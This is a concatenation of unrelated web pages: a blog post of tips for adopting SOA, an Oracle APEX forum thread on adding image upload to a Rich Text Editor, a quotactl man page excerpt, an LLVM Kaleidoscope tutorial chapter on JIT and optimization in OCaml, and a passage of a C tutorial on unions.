And now to my other project that is close to my heart at the moment, which is SOA. As you may recall, we were having difficulty in selling the idea of SOA in our business; this has now changed. We have a project and a business sponsor. So in this post I want to reflect on some of the tips I've picked up so far that I would like to share with you. Now, this list isn't completely comprehensive; I'm bound to have missed something out, but hey, something to talk about in future posts. Tip 1 – Don't do anything until you have got buy-in from a business user. Like any major change, you will need backing from someone with a cash flow who gets it. Tip 2 – Define the business requirements before you start, and prioritise them to find out which area would most benefit. This also helps the ROI case. Tip 3 – Start small. This was a problem with my last attempt: I was over-ambitious and the risk was too great for management to swallow. With a new business unit that wants to have its own new application, but with the ability to integrate into the existing systems without forcing any change to those systems, we have an ideal scenario. Tip 4 – Make a plan; manage your expectations and those of the business and your management on exactly how you are going to get 'there' and where 'there' is. A good way to do this is to create a 'maturity model', which I have only read about on Microsoft sites, but turning to IBM, they have a lovely example, which is below. You can read more about this diagram here at the wonderful CBDI Forum. Tip 5 – Education. Give a clear and concise message about the goal you are trying to achieve using SOA, so it is easy to understand. Demonstrate if need be, getting in different vendors; we used IBM and Microsoft. They both presented about SOA and they were both very consistent with each other on style and approach; it was just the technology sell at the end that was different. Don't forget to take the technical staff as well as management with you.
It's important to get buy-in from all levels. SOA isn't rocket science or blue-sky; it's best practice for loosely-coupled integration. Get that message across simply and clearly. Avoid buzzwords, or people will start playing bingo in your presentations. The most important person to educate is yourself: make sure that you invest time in your learning so you can understand fully what you're doing and what you will be asking others to do. There's no point in asking someone to write an XML Schema if you don't know what one is and where it fits into the picture, as an example. Tip 6 – Use web services. For the life of me I can't see any point in trying to do SOA with any other technology; it would just be too much of a pain in the arse, so it just wouldn't be worth it. Yes, of course, if you were to follow the rule book you could use any distributed technology, but the truth of the matter is that there aren't that many distributed technologies that are platform independent (ok, perhaps CORBA and MQ), and only web services have such broad commitment from all the big vendors, all of whom are investing heavily in the technology; Microsoft is in fact betting the farm ... and web services are soooo easy! The anti-web-services stuff is so yesterday; get over it. Tip 7 – Work out your namespaces and schemas first, but remember, for all the will in the world you aren't going to get it right first time. So in your plan have a re-engineering phase; don't make it a surprise that you will need to go back and fix things. Don't sell SOA as a silver bullet; it's a best practice, and like all best practices it gets better each time you practice. The sweet point for this in your plan will be when you have learnt a great deal but not yet fully implemented a lot. Tip 8 – Categorise your services.
Pretty soon you are going to have 100+ services and you will soon get spaghetti if you're not careful. Matt Deacon from Microsoft in a recent presentation recommended these categories:

Entity Services
• Represent simple atomic operations on an Entity

Activity Services
• Coordinate several Entity Services to enable Business Function execution (UpdateCustomer, AcceptPO)
• Implement common business transactions

Enterprise Services
• Represent enterprise-wide, or public B2B services

Infrastructure Services
• Provide common functionality to other services
• Represent horizontal common services across organisations
• Strong buy-versus-build bias
• Enable Security, Management and Metering/Monitoring
• Examples include Authentication, Authorization, Logging, Exception management

Event Services
• Notify subscribers of interesting events triggered

Tip 9 - Work out your security model. This I believe will be one of the most painful things to go back and re-work, so it's a really good idea to work it out before starting. Inside the Generico sample SOA application found here you will find a white paper that defines three methodologies to choose from, and they are (and I will quote directly from the document to save any confusion):

1. Use Windows integrated authentication throughout by specifying Windows as the authentication mechanism in all Web.config files and the IIS configurations of all Web applications. This means we don't bother implementing any form-based login mechanism and instead rely on the browser providing credentials, perhaps showing a login dialog to collect them from the user if necessary. This allows us to use http as the protocol for all messages since the infrastructure will take care of performing authentication and authorization.

2. Use a custom authentication mechanism in the application and use Windows authentication in the service. In this case, specify Forms or None in the Web.config files and allow anonymous access in IIS.
Also, use https between the browser and the Web application when collecting credentials in a Web form.

3. Use a custom authentication mechanism in the application and use WSE (WS-Security and WS-Policy) in the service. This methodology resembles the custom methodology above concerning the communication between the browser and the Web application, since it still means specifying Forms or None in the Web.config files, allowing anonymous access in IIS, and using https between the browser and the Web application. Where it differs is how it secures the communication between the Web applications and the Web services they use.

Now I have to be honest, I'm still working on this one, so I will let you know which method we pick and why. Anyway, I hope you've found my tips useful.
http://geekswithblogs.net/SabotsShell/archive/2005/09/13/53617.aspx
Adding image upload functionality to Rich Text Editor
Jacob Madsen  Jan 3, 2019 4:01 PM

Hello forum. I'm trying to implement image upload functionality in the Rich Text Editor by following the example given in this blog post: The end product will be a documentation management system, where the editing functionality is crucial.

My environment: APEX 18.2, ORDS 18.3, WebLogic 12.2.1.3. I have already made the RESTful service to provide the direct image link from the BLOB, as described in the blog article - everything works as described in the blog post. But I'm facing two challenges with the example given:

1. The Submit button in the Image Upload page allows submitting the page even if the user has not chosen any file, causing a null BLOB to be created. Upload should only be allowed if the user has actually chosen a file. How can I modify the Submit button so it takes this into consideration?

2. Next - again the Submit button in the Image Upload page. When launched, the URL of this page looks like this (in my setup): In the Function and Global Variable Declaration, in the example, a piece of JavaScript is given:

function returnFileUrl( pId ) {
    var funcNum = getUrlParam( 'CKEditorFuncNum' ),
        // Achtung: hier anpassen!
        fileUrl = "/ords/bska/apex/apex_bska_001/image/download/" + pId;

    function getUrlParam( paramName ) {
        var reParam = new RegExp( '(?:[\?&]|&)' + paramName + '=([^&]+)', 'i' );
        var match = window.location.search.match( reParam );
        return ( match && match.length > 1 ) ? match[1] : null;
    }

    window.opener.CKEDITOR.tools.callFunction( funcNum, fileUrl );
    window.close();
}

The big problem is that this JavaScript fails after having submitted this page once, as the URL looks like this after a Submit:::: The getUrlParam function works before the Submit because "CKEditorFuncNum=1" is part of the URL. But after doing a Submit, this is no longer part of the URL.
For that reason, the getUrlParam function returns null - which means that you can only return existing images if you don't upload an image, i.e. submit the page. This can hardly be the intention. How do you Submit without altering window.location.search? Thanks in advance

1. Re: Adding image upload functionality to Rich Text Editor
Carsten Czarski-Oracle  Jan 7, 2019 8:41 AM (in response to Jacob Madsen)

Hi Jacob, happy new Year 2019. The answer to your question 1 is simple: You can add a Dynamic Action to your upload page as follows:
- Create it on Change of the File Browse item
- use the item value is NOT NULL condition
- As TRUE action, show the button (or enable it); as FALSE action hide the button (or disable it)

As a result, end users will not be able to submit the page when no file has been chosen. In addition to that, you might add some code to the tr_pk_editor_images trigger, which raises an error if the BLOB is empty or NULL.

create or replace trigger tr_pk_editor_images
before insert on tab_editor_images
for each row
begin
    if :new.image is null or sys.dbms_lob.getlength(:new.image) = 0 then
        raise_application_error(-20000, 'Empty files are not allowed!');
    end if;
    :new.id          := seq_editor_images.nextval;
    :new.uploaded_at := sysdate;
    :new.uploaded_by := coalesce( v( 'APP_USER' ), sys_context( 'userenv', 'current_user' ) );
end;

Regarding your question 2, I'm afraid I don't quite get what you mean. Do you, by chance, have a test case for me (e.g. on apex.oracle.com)...? Thanks and best regards -Carsten

2. Re: Adding image upload functionality to Rich Text Editor
Jacob Madsen  Jan 7, 2019 12:22 PM (in response to Carsten Czarski-Oracle)

Hi Carsten, thanks for your answer. Sorry, but I don't understand what you don't understand. Have you tried running your own example, uploaded an image - i.e. chosen a file, hit the Submit button and then clicked on one of the images in the list to return the URL to the file dialog in the Rich Text Editor?
This doesn't work.
- If you open the file upload page and choose an existing file, you get a valid URL back to the Rich Text Editor.
- However, if you first upload a file, you will get a blank URL back to the Rich Text Editor.

This is because your returnFileUrl function checks whether window.location.search - i.e. the URL for the file upload page - changes once you have hit the Submit button. Your JavaScript code checks whether the URL contains "CKEditor"; after hitting the Submit button this check fails, and the function returns a blank value. Please inspect your returnFileUrl function. Why do you perform this check in your function?

var match = window.location.search.match( reParam );

Look at the URL of the file upload page after hitting the Submit button - i.e. after you have uploaded a file. The URL changes in the way I already described, causing your returnFileUrl function to fail, as I described. Please try running your example and see if you can get a URL back to the Rich Text Editor right after uploading an image. Is it clear now? I don't know how else to describe it. I've tried my best to describe it; I thought it was 100% clear.

Regarding your solution to my first question: your solution is not 100% complete. As far as I can see, I need two dynamic actions:
- One which disables the button if the value of the Filename item is NULL.
- One which enables the button if the value of the Filename item is NOT NULL.

Otherwise the button will be enabled by default, and the user can still upload a NULL file. But if I create two Dynamic Actions, I can enable and disable the button as needed. But can you please tell me if you understand my second question now? I believe that if you run your own example, upload a file and then choose a file, you should see the behavior. Thanks in advance! 3.
Re: Adding image upload functionality to Rich Text Editor
Carsten Czarski-Oracle  Jan 7, 2019 12:43 PM (in response to Jacob Madsen)

Hi Jacob, let me walk through this step by step - I will come back to you. Regarding your question 1: You will need one(!) Dynamic Action. The condition is the Client-Side Condition. Then, as the TRUE action, show the UPLOAD button. As the FALSE action, hide the UPLOAD button. Best regards -Carsten

4. Re: Adding image upload functionality to Rich Text Editor
Carsten Czarski-Oracle  Jan 7, 2019 2:49 PM (in response to Carsten Czarski-Oracle)

Hi Jacob, I now have carefully revisited all the steps - and I can see what happens. Thank you very much for making me aware of this. The issue is that the Rich Text Editor (CKEditor) adds some special URL parameters when invoking the Browse Server dialog page - these are needed to correctly pass back the image URL ( ). When you upload a new image, those parameters are lost. I now have updated the blog posting (at the end of the Add an image uploading facility to the Rich Text Editor section) with a few more steps in order to preserve those parameters. Have a look and let me know whether this works for you. I hope this helps. Best regards -Carsten

5. Re: Adding image upload functionality to Rich Text Editor
Jacob Madsen  Jan 9, 2019 3:21 PM (in response to Carsten Czarski-Oracle)

Hi Carsten. This was exactly the response I was looking for regarding question 2. Thanks! However, I do believe there is one important thing you forgot to mention. Regarding the new hidden item to save the parameters: make sure its "Source" is set to Null. Otherwise you get errors when clicking Submit, that "CKEDITOR_PARAMS is not a database item" etc. It took a while for me to figure this one out. But after finally finding the cause of this error, your example works perfectly. I can now finally choose a file I just submitted! Now that I have you:
In the same article, you give an example of how to make the CKEditor component responsive. I can't get your example to work. When following your example under "Responsive Rich Text editor", I just get JavaScript errors. The browser console reports this when the page loads:

Uncaught TypeError: apex.da.initDaEventList is not a function
    at f?p=101:1:85412931328::::::194
    at f?p=101:1:85412931328::::::194
    at i (desktop_all.min.js?v=18.2.0.00.12:2)
    at Object.add [as done] (desktop_all.min.js?v=18.2.0.00.12:2)
    at HTMLDocument.<anonymous> (f?p=101:1:85412931328::::::174)
    at Object.a.init (desktop_all.min.js?v=18.2.0.00.12:16)
    at HTMLDocument.<anonymous> (f?p=101:1:85412931328::::::172)
    at j (desktop_all.min.js?v=18.2.0.00.12:2)
    at k (desktop_all.min.js?v=18.2.0.00.12:2)

My JavaScript Initialization Code for my CKEditor component looks like this. The name of my CKEditor component is P1_NEW.

function ( configObject ) {
    configObject.uiColor = "#AADC6E";
    configObject.resize_enabled = false;
    configObject.filebrowserBrowseUrl = "f?p=" + $v( "pFlowId" ) + ":2:" + $v( "pInstance" ) + "::" + $v( "pdebug" );
    configObject.filebrowserWindowWidth = 640;
    configObject.width = $( "#P1_NEW" ).closest( ".t-Form-inputContainer" ).width() - 5;
    configObject.height = 300; // Specify your desired item height, in pixels
    configObject.resize_dir = 'vertical';
    return configObject;
}

And my Resize event looks like this:

CKEDITOR.instances.P1_NEW.resize( $("#P1_NEW" ).closest( ".t-Form-inputContainer" ).width()

What's wrong here? Thanks in advance!

6. Re: Adding image upload functionality to Rich Text Editor
Jacob Madsen  Jan 9, 2019 4:40 PM (in response to Jacob Madsen)

Carsten, I have found the cause of this error as well. The code in the event is incomplete. I found the error by comparing to Joel Kallman's similar example.
In your blog post, you have:

CKEDITOR.instances.{PX_item-name}.resize( $("#{PX_item-name}" ).closest( ".t-Form-inputContainer" ).width()

But in Joel's example, it is:

CKEDITOR.instances.P3_RESUME.resize( $("#P3_RESUME").closest(".t-Form-inputContainer").width() - 5, 300);

As you can see, something is clearly cut off in your example. When I use Joel's example, the JavaScript error goes away. But the responsive thing still doesn't work. Resizing the window does nothing. Please help fixing this. Thanks in advance!

7. Re: Adding image upload functionality to Rich Text Editor
Carsten Czarski-Oracle  Jan 9, 2019 4:47 PM (in response to Jacob Madsen)

Hi Jacob, but you are running 18.2, right? So you don't need to apply all that JavaScript. Just navigate to Shared Components > Component Settings and enable Responsiveness for your Rich Text Editors there. The out-of-the-box functionality should also be more complete than custom JavaScript. Best regards -Carsten

8. Re: Adding image upload functionality to Rich Text Editor
Jacob Madsen  Jan 10, 2019 12:28 PM (in response to Carsten Czarski-Oracle)

Carsten, I can't get this to work. Yes, I'm running 18.2, and I found the setting under Component Settings. It's by default set to Responsive=Yes. But the Rich Text Editor does not resize itself when the window is resized. Are any extra settings needed? EDIT: It works to some extent. The editor only resizes automatically with this setting when the window is made larger, not when it's made smaller. Why is this? This looks like a bug to me.

9. Re: Adding image upload functionality to Rich Text Editor
Carsten Czarski-Oracle  Jan 10, 2019 2:20 PM (in response to Jacob Madsen)

Hi Jacob, hmmm ... are you using the Universal Theme ...? Best regards -Carsten 10.
Re: Adding image upload functionality to Rich Text Editor
Jacob Madsen  Jan 10, 2019 4:04 PM (in response to Carsten Czarski-Oracle)

Edit Application Properties -> User Interface -> Theme = "Universal Theme - 42". If I hit F5 to refresh after making the window smaller, the Rich Text Editor is adjusted to the correct size.

11. Re: Adding image upload functionality to Rich Text Editor
Carsten Czarski-Oracle  Jan 10, 2019 4:26 PM (in response to Jacob Madsen)

Hi Jacob, the resize stuff should be independent from the rest of your application ... could you provide that as a single page test case on apex.oracle.com ...? Best regards -Carsten

12. Re: Adding image upload functionality to Rich Text Editor
Jacob Madsen  Jan 11, 2019 8:56 AM (in response to Carsten Czarski-Oracle)

Hi Carsten. I can't. I don't have an account on apex.oracle.com. I applied for one a long time ago, but nobody ever bothered to respond. Could you eventually help me get this fixed?

13. Re: Adding image upload functionality to Rich Text Editor
Carsten Czarski-Oracle  Jan 11, 2019 9:33 AM (in response to Jacob Madsen)

Hi Jacob, this process is 100% automated. Just make sure to enter a valid email address; after application you should get an email, and as soon as you confirm, the workspace should be created ... I would recommend giving it one more try. Let me know whether this works ... Best regards -Carsten

14. Re: Adding image upload functionality to Rich Text Editor
Jacob Madsen  Jan 28, 2019 2:30 PM (in response to Carsten Czarski-Oracle)

Hi Carsten. I managed to get an account on apex.oracle.com. I then simply exported the application from my own instance and imported it on my new instance. I can still reproduce the behavior on apex.oracle.com. Making the window smaller does not automatically resize the Rich Text Editor. Shouldn't it? Try for yourself::::::
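As a footnote to the thread: the failure mode Jacob describes - getUrlParam returning null once a submit has changed the query string - is easy to reproduce outside the browser. Below is a hedged sketch (the function name and the fallback argument are inventions for illustration, not part of the blog post or of APEX) of a parameter lookup that takes the search string explicitly and falls back to a previously saved value, which is essentially what Carsten's updated steps achieve with a hidden item:

```javascript
// Hypothetical helper: parse a parameter from an explicit search string,
// falling back to a previously saved value (e.g. from a hidden page item).
function getParamWithFallback(search, paramName, savedValue) {
    var reParam = new RegExp('(?:[?&])' + paramName + '=([^&]+)', 'i');
    var match = search.match(reParam);
    if (match && match.length > 1) {
        return match[1];
    }
    return savedValue !== undefined ? savedValue : null;
}

// Before the submit, the value comes straight from the URL:
console.log(getParamWithFallback('?CKEditorFuncNum=1&CKEditorLang=en',
                                 'CKEditorFuncNum', '1')); // '1' from the URL
// After the submit, the query string no longer carries it, so the saved copy is used:
console.log(getParamWithFallback('?p=101:2:13829:::::',
                                 'CKEditorFuncNum', '1')); // '1' from the fallback
```

With this shape, whether the page has been submitted or not no longer matters, as long as the value was stashed away the first time the dialog page was opened.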
https://community.oracle.com/thread/4193225
Current Version: Linux Kernel - 3.80

Synopsis

#include <sys/quota.h>
#include <xfs/xqm.h>

int quotactl(int cmd, const char *special, int id, caddr_t addr);

Description

- Q_GETSTATS - Get statistics and other generic information about the quota subsystem. The addr argument should be a pointer to a dqstats structure in which data should be stored. This structure is defined in <sys/quota.h>. The special and id arguments are ignored. This operation is obsolete and not supported by recent kernels.
- Q_XQUOTAON - Turn on quotas for an XFS filesystem. The addr argument points to an unsigned int that specifies whether quota accounting and/or limit enforcement need to be turned on. This operation requires privilege (CAP_SYS_ADMIN).
- Q_XQUOTAOFF - Turn off quotas for an XFS filesystem. As with Q_XQUOTAON, XFS filesystems expect a pointer to an unsigned int that specifies whether quota accounting and/or limit enforcement need to be turned off. This operation requires privilege (CAP_SYS_ADMIN).
- Q_XGETQUOTA - Get disk quota limits and current usage for user id. The addr argument is a pointer to an fs_disk_quota structure (defined in <xfs/xqm.h>). Unprivileged users may retrieve only their own quotas; a privileged user (CAP_SYS_ADMIN) may retrieve the quotas of any user.
- Q_XSETQLIM - Set disk quota limits for user id. The addr argument is a pointer to an fs_disk_quota structure (defined in <xfs/xqm.h>). This operation requires privilege (CAP_SYS_ADMIN).
- Q_XGETQSTAT - Returns an fs_quota_stat structure containing XFS filesystem-specific quota information. This is useful for finding out how much space is used to store quota information and for checking the quota-on status of the filesystem.

Return Value

On success, quotactl() returns 0; on error -1 is returned, and errno is set to indicate the error.

Errors

- EFAULT - addr or special is invalid.
- EINVAL - cmd or type is invalid.
- ESRCH - No disk quota is found for the indicated user, or quotas have not been turned on for this filesystem.

If cmd is Q_SETQUOTA, quotactl() may also set errno to:

- ERANGE - Specified limits are out of range allowed by quota format.
If cmd is Q_QUOTAON, quotactl() may also set errno to:

- EACCES - The quota file pointed to by addr exists, but is not a regular file; or, the quota file pointed to by addr exists, but is not on the filesystem pointed to by special.
- EBUSY - Q_QUOTAON attempted, but another Q_QUOTAON had already been performed.
- EINVAL - The quota file is corrupted.
- ESRCH - Specified quota format was not found.

See Also

Colophon

License & Copyright

Copyright (c) 2010, Jan Kara
A few pieces copyright (c) 1996 Andries Brouwer (aeb@cwi.nl) and copyright 2010
https://community.spiceworks.com/linux/man/2/quotactl
Welcome to Chapter 4 of the "Implementing a language with LLVM" tutorial. Note: the default IRBuilder now always includes the constant folding optimisations below.

Our demonstration for Chapter 3 is elegant and easy to extend. Unfortunately, it does not produce wonderful code. For example, when compiling simple code, we don't get obvious optimizations:

ready> def test(x) 1+2+x;
Read function definition:
define double @test(double %x) {
entry:
        %addtmp = fadd double 1.000000e+00, 2.000000e+00
        %addtmp1 = fadd double %addtmp, %x
        ret double %addtmp1
}

This code is a very, very literal transcription of the AST built by parsing the input. As such, this transcription lacks optimizations like constant folding (we'd like to get "add x, 3.0" in the example above) as well as other more important optimizations. Constant folding, in particular, is a very common and very important optimization: so much so that many language implementors implement constant folding support in their AST representation. With LLVM, you don't need this support in the AST, because all calls to build LLVM IR can go through a builder that checks for constant folding opportunities itself; this is what the LLVMFoldingBuilder class does. All we did was switch from LLVMBuilder to LLVMFoldingBuilder. Though we changed no other code, we now have all of our instructions implicitly constant folded without us having to do anything about it. For example, the input above now compiles to:

ready> def test(x) 1+2+x;
Read function definition:
define double @test(double %x) {
entry:
        %addtmp = fadd double 3.000000e+00, %x
        ret double %addtmp
}

Well, that was easy :). In practice, we recommend always using LLVMFoldingBuilder when generating code like this. It has no "syntactic overhead" for its use and it can dramatically reduce the amount of LLVM IR that is generated in some cases. On the other hand, the LLVMFoldingBuilder is limited by the fact that it does all of its analysis inline with the code as it is built.
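To see what "constant folding at IR construction time" means, here is a toy sketch in plain OCaml (this is not the LLVM bindings; the types and names are invented for illustration): a build_add that folds whenever both operands are already constants, in the same spirit as the folding builder's fadd.

```ocaml
(* Toy AST standing in for LLVM values; not the real bindings. *)
type expr =
  | Num of float
  | Var of string
  | Add of expr * expr

(* A "folding" constructor: if both operands are constants, compute the
   result now instead of emitting an add instruction. *)
let build_add lhs rhs =
  match lhs, rhs with
  | Num a, Num b -> Num (a +. b)
  | _ -> Add (lhs, rhs)

let () =
  (* 1+2+x folds to Add (Num 3., Var "x"), mirroring "fadd double 3.0, %x" *)
  match build_add (build_add (Num 1.) (Num 2.)) (Var "x") with
  | Add (Num c, Var v) -> Printf.printf "addtmp = fadd double %g, %%%s\n" c v
  | _ -> print_endline "not folded"
```

Because the decision is made call-by-call as the IR is constructed, the builder can only see the operands it is handed right now, which is exactly the limitation the next example exposes.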
If you take a slightly more complex example:

ready> def test(x) (1+2+x)*(x+(1+2));
ready> Read function definition:
define double @test(double %x) {
entry:
        %addtmp = fadd double 3.000000e+00, %x
        %addtmp1 = fadd double %x, 3.000000e+00
        %multmp = fmul double %addtmp, %addtmp1
        ret double %multmp
}

In this case, the LHS and RHS of the multiplication are the same value. We'd really like to see this generate "tmp = x+3; result = tmp*tmp;" instead of computing "x+3" twice. No amount of local analysis at construction time will detect and correct this; it requires reassociation of expressions (to make the adds lexically identical) and Common Subexpression Elimination to delete the redundant add. Fortunately, LLVM provides a broad range of optimizations in the form of "passes"; for more information, see the How to Write a Pass document and the List of LLVM Passes.

In order to get per-function optimizations going, we need to set up a Llvm.PassManager to hold and organize the LLVM optimizations that we want to run. Once we have that, we can add a set of optimizations to run. The code looks like this:

let main () =
  ...
  (* Create the JIT. *)
  let the_execution_engine = ExecutionEngine.create Codegen.the_module in
  let the_fpm = PassManager.create_function Codegen.the_module in

  (* Set up the optimizer pipeline.  Start with registering info about how the
   * target lays out data structures. *)
  DataLayout.add (ExecutionEngine.target_data the_execution_engine) the_fpm;

  (* Do simple "peephole" optimizations and bit-twiddling optzns. *)
  add_instruction_combination the_fpm;

  (* reassociate expressions. *)
  add_reassociation the_fpm;

  (* Eliminate Common SubExpressions. *)
  add_gvn the_fpm;

  (* Simplify the control flow graph (deleting unreachable blocks, etc). *)
  add_cfg_simplification the_fpm;

  ignore (PassManager.initialize the_fpm);
  ...

The meat of the matter here is the definition of "the_fpm". It requires the_module to construct itself; once it is set up, we use a series of "add" calls to add a bunch of LLVM passes. The "the_execution_engine" variable is related to the JIT, which we will get to in the next section.

In this case, we choose to add 4 optimization passes. The passes we chose here are a pretty standard set of "cleanup" optimizations that are useful for a wide variety of code. I won't delve into what they do but, believe me, they are a good starting place :).

Once the Llvm.PassManager is set up, we need to make use of it. We do this by running it after our newly created function is constructed (in Codegen.codegen_func), but before it is returned to the client:

let codegen_func the_fpm = function
  ...
      (* Validate the generated code, checking for consistency. *)
      Llvm_analysis.assert_valid_function the_function;

      (* Optimize the function. *)
      let _ = PassManager.run_function the_function the_fpm in

      the_function

As you can see, this is pretty straightforward. The the_fpm optimizes and updates the LLVM Function* in place, improving (hopefully) its body.
With this in place, we can try our test above again:

ready> def test(x) (1+2+x)*(x+(1+2));
ready> Read function definition:
define double @test(double %x) {
entry:
        %addtmp = fadd double %x, 3.000000e+00
        %multmp = fmul double %addtmp, %addtmp
        ret double %multmp
}

As expected, we now get our nicely optimized code, saving a floating point add instruction from every execution of this function.

LLVM provides a wide variety of optimizations that can be used in certain circumstances. Some documentation about the various passes is available, but it isn't very complete. Another good source of ideas can come from looking at the passes that Clang runs to get started. The "opt" tool allows you to experiment with passes from the command line, so you can see if they do anything.

Now that we have reasonable code coming out of our front-end, let's talk about executing it. In order to do this, we first declare and initialize the JIT. This is done by adding a global variable and a call in main:

...
let main () =
  ...
  (* Create the JIT. *)
  let the_execution_engine = ExecutionEngine.create Codegen.the_module in
  ...

This creates an abstract "Execution Engine" which can be either a JIT compiler or the LLVM interpreter. LLVM will automatically pick a JIT compiler for you if one is available for your platform, otherwise it will fall back to the interpreter.

Once the Llvm_executionengine.ExecutionEngine.t is created, the JIT is ready to be used. There are a variety of APIs that are useful, but the simplest one is the "Llvm_executionengine.ExecutionEngine.run_function" function. This method JIT compiles the specified LLVM Function and returns a function pointer to the generated machine code. In our case, this means that we can change the code that parses a top-level expression to look like this:

(* Evaluate a top-level expression into an anonymous function. *)
let e = Parser.parse_toplevel stream in
print_endline "parsed a top-level expr";
let the_function = Codegen.codegen_func the_fpm e in
dump_value the_function;

(* JIT the function, returning a function pointer. *)
let result = ExecutionEngine.run_function the_function [||]
  the_execution_engine in

print_string "Evaluated to ";
print_float (GenericValue.as_float Codegen.double_type result);
print_newline ();

With just these two changes, let's see how Kaleidoscope works now!

ready> 4+5;
define double @""() {
entry:
        ret double 9.000000e+00
}

Evaluated to 9.000000

Well this looks like it is basically working.
The dump of the function shows the "no argument function that always returns double" that we synthesize for each top-level expression that is typed in. This demonstrates very basic functionality, but can we do more?

ready> def testfunc(x y) x + y*2;
Read function definition:
define double @testfunc(double %x, double %y) {
entry:
        %multmp = fmul double %y, 2.000000e+00
        %addtmp = fadd double %multmp, %x
        ret double %addtmp
}

ready> testfunc(4, 10);
define double @""() {
entry:
        %calltmp = call double @testfunc(double 4.000000e+00, double 1.000000e+01)
        ret double %calltmp
}

Evaluated to 24.000000

This illustrates that we can now call user code, but there is something a bit subtle going on here. Note that we only invoke the JIT on the anonymous functions that call testfunc, but we never invoked it on testfunc itself. What actually happened here is that the JIT scanned for all non-JIT'd functions transitively called from the anonymous function and compiled all of them before returning from run_function.

Even with this simple code, we get some surprisingly powerful capabilities - check this out :) :

ready> extern sin(x);
Read extern:
declare double @sin(double)
ready> extern cos(x);
Read extern:
declare double @cos(double)
ready> sin(1.0);
Evaluated to 0.841471
ready> def foo(x) sin(x)*sin(x) + cos(x)*cos(x);
Read function definition:
define double @foo(double %x) {
entry:
        %calltmp = call double @sin(double %x)
        %multmp = fmul double %calltmp, %calltmp
        %calltmp2 = call double @cos(double %x)
        %multmp4 = fmul double %calltmp2, %calltmp2
        %addtmp = fadd double %multmp, %multmp4
        ret double %addtmp
}

ready> foo(4.0);
Evaluated to 1.000000

How does the JIT know about sin and cos? Since there is no body defined for these functions, the JIT resolves them by effectively calling "dlsym("sin")" on the Kaleidoscope process itself. Since "sin" is defined within the JIT's address space, it simply patches up calls in the module to call the libm version of sin directly. The LLVM JIT provides a number of interfaces (look in llvm_executionengine.mli) for controlling how unknown functions get resolved. One interesting application of this is that we can now extend the language by writing arbitrary C code to implement operations.
For example, if we add:

/* putchard - putchar that takes a double and returns 0. */
extern "C" double putchard(double X) {
  putchar((char)X);
  return 0;
}

Now we can produce simple output to the console by using things like: "extern putchard(x); putchard(120);", which prints a lowercase 'x' on the console (120 is the ASCII code for 'x'). Similar code could be used to implement file I/O, console input, and many other capabilities in Kaleidoscope.

This completes the JIT and optimizer chapter of the Kaleidoscope tutorial. At this point, we can compile a non-Turing-complete programming language, and optimize and JIT compile it in a user-driven way. Next up we'll look into extending the language with control flow constructs, tackling some interesting LLVM IR issues along the way.

Here is the complete code listing for our running example, enhanced with the LLVM JIT and optimizer. To build this example, use:

# Compile
ocamlbuild toy.byte
# Run
./toy.byte

Here is the code:

_tags:
<{lexer,parser}.ml>: use_camlp4, pp(camlp4of)
<*.{byte,native}>: g++, use_llvm, use_llvm_analysis
<*.{byte,native}>: use_llvm_executionengine, use_llvm_target
<*.{byte,native}>: use_llvm_scalar_opts, use_bindings

token.ml:
(*===----------------------------------------------------------------------===
 * Lexer Tokens
 *===----------------------------------------------------------------------===*)

(* The lexer returns these 'Kwd' if it is an unknown character, otherwise one of
 * these others for known things. *)
type token =
  (* commands *)
  | Def | Extern

  (* primary *)
  | Ident of string | Number of float

  (* unknown *)
  | Kwd of char

codegen.ml:
...
let codegen_func the_fpm = function
  ...
      with e ->
        delete_function the_function;
        raise e

toplevel.ml:
...
      with Stream.Error s | Codegen.Error s ->
        (* Skip token for error recovery.
*)
        Stream.junk stream;
        print_endline s;
  end;
  print_string "ready> "; flush stdout;
  main_loop the_fpm the_execution_engine stream

(*===----------------------------------------------------------------------===
 * Main driver code.
 *===----------------------------------------------------------------------===*)

toy.ml:
open Llvm
open Llvm_executionengine
open Llvm_target
open Llvm_scalar_opts

let main () =
  ignore (initialize_native_target ());
  ...

  (* Print out all the generated code. *)
  dump_module Codegen.the_module
;;

main ()

putchar.c:
#include <stdio.h>

/* putchard - putchar that takes a double and returns 0. */
extern double putchard(double X) {
  putchar((char)X);
  return 0;
}

Next: Extending the language: control flow
http://www.llvm.org/docs/tutorial/OCamlLangImpl4.html
; char name[30]; int phone_number; };

Declaration of Union Variables

We declare the variables of a union in the same way as we declare those of a structure. Again, let's take the same example in which we want to store the data of students:

union student {
    int roll_no;
    char name[30];
    int phone_number;
};

int main() {
    union student p1, p2, p3;
}

There is another method of declaring union variables, where we declare these at the time of defining the union as follows.

union student {
    int roll_no;
    char name[30];
    int phone_number;
} p1, p2, p3;

Like structure, we assign the name, roll no and phone number of the first student (suppose p1) by accessing its name, roll_no and phone_number as follows.

p1.roll_no = 1;

Here, p1.roll_no implies roll_no of p1. Always use strcpy to assign a string value to a variable, as we assigned the name "Brown" to p1 (first student).

strcpy(p1.name, "Brown");

Till now, you must have found union similar to structure. Now let's look at the differences between the two.

Difference between union and structure

Before going into the differences, let's first look at an example.

#include <stdio.h>

struct student1 { // defining a structure
    int roll_no;
    char name[40];
    int phone_number;
};

union student2 { // defining a union
    int roll_no;
    char name[40];
    int phone_number;
};

int main() {
    struct student1 s1;
    union student2 u1;
    printf("size of structure = %d\n", (int)sizeof(s1));
    printf("size of union = %d\n", (int)sizeof(u1));
    return 0;
}

The size of a structure is at least the sum of the sizes of its members, while the size of a union is the size of its largest member (here, on a typical platform with 4-byte int, 48 bytes for the structure and 40 for the union). This is because a union occupies one shared memory space for all of its members, whereas a structure occupies a separate space for each. That is also why, in a structure, we can access all member variables at the same time, because different memory spaces are occupied by each.

Now let's see an example of union.

#include <stdio.h>
#include <string.h>

union student {
    int roll_no;
    int phone_number;
    char name[30];
};

int main() {
    union student p1;
    p1.roll_no = 1;
    p1.phone_number = 1234567822;
    strcpy(p1.name, "Brown");
    printf("roll_no : %d\n", p1.roll_no);
    printf("phone_number : %d\n", p1.phone_number);
    printf("name : %s\n", p1.name);
    return 0;
}

roll_no : 2003792450
phone_number : 2003792450
name : Brown

As you can see, the name got printed as it is, and garbage values got printed as roll number and phone number. Let's see why this happened.
As you now know, we can access only one member of a union at a time, and the other members get corrupted. So, when we wrote p1.roll_no = 1, the member 'roll_no' got accessed and assigned the value 1. Then p1.phone_number = 1234567822 overwrote that same memory, and finally strcpy(p1.name, "Brown") overwrote it again, so only 'name' holds a meaningful value at the end; reading roll_no or phone_number afterwards just reinterprets the bytes of "Brown". If instead we print each member right after assigning it, every value comes out correctly:

#include <stdio.h>
#include <string.h>

union student {
    int roll_no;
    char name[30];
    int phone_number;
};

int main() {
